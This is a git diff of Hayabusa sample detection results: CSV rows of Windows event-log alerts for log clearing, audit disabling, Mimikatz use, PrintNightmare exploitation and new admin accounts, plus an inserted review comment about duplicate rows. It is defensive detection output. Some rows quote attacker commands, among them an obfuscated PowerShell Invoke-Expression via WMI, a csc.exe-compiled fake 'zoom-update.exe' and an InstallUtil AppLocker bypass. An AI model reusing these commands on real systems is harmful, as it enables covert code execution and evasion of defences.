admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 
+09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 
-2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit 
policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit 
policy disabled/ID4719-Audit policy deactivation.evtx -2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" -2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" -2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server 
installation (PrintNightmare).evtx" -2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx -2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" -2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" -2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx -2021-10-28 
22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx -2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx -2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs : Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx -2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil : Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx -2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary 
Proxy Execution InstallUtil/sysmon.evtx \ No newline at end of file diff --git a/sample-results/hayabusa-sample-results-2022-04-16.csv b/sample-results/hayabusa-sample-results-2022-04-16.csv new file mode 100644 index 00000000..55a6f0af --- /dev/null +++ b/sample-results/hayabusa-sample-results-2022-04-16.csv 
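Review bot: the removed sample file carries seven byte-identical rows for the single 4719 "Disabling Windows Event Auditing" event at 2021-10-26 03:30:36.515 (same computer, same rule path, same evtx path), which reads as the same input being counted repeatedly rather than seven distinct events; before the regenerated sample is accepted, confirm that the replacement file no longer contains these duplicates, or that the sample-evtx set does not reference that evtx more than once. The removed rows also use the older 8-column layout without the MitreAttack field that the replacement file's header introduces, so any documentation or tooling that parses the sample CSV by column position should be checked against the new header.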
@@ -0,0 +1,18158 @@ +Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath +2013-10-23 16:16:13.843 +00:00,37L4247D28-05,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:16:27.000 +00:00,37L4247D28-05,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:29.468 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Heartbeat Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Heartbeat | Account: NT AUTHORITY\NetworkService | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:32.328 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: SynthVid | Path: system32\DRIVERS\VMBusVideoM.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:38.218 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Data Exchange Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature KvpExchange | Account: NT AUTHORITY\LocalService | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:40.125 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Guest Shutdown Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Shutdown | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:41.421 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: 
Hyper-V Volume Shadow Copy Requestor | Path: %SystemRoot%\system32\vmicsvc.exe -feature VSS | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:43.125 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: netvsc | Path: system32\DRIVERS\netvsc60.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:17:44.875 +00:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Time Synchronization Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature TimeSync | Account: NT AUTHORITY\LocalService | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:18:11.000 +00:00,37L4247D28-05,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:18:50.500 +00:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:21:28.000 +00:00,IE8Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 16:21:33.630 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:39.911 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2013-10-23 16:22:39.973 +00:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-23 16:22:39.973 +00:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:40.004 +00:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-23 16:22:40.004 +00:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:44.979 +00:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:44.979 +00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x298c5 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:44.979 
+00:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x29908 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:22:44.979 +00:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 16:24:00.161 +00:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:27:21.754 +00:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-23 17:29:39.000 +00:00,IE8Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-23 17:30:52.625 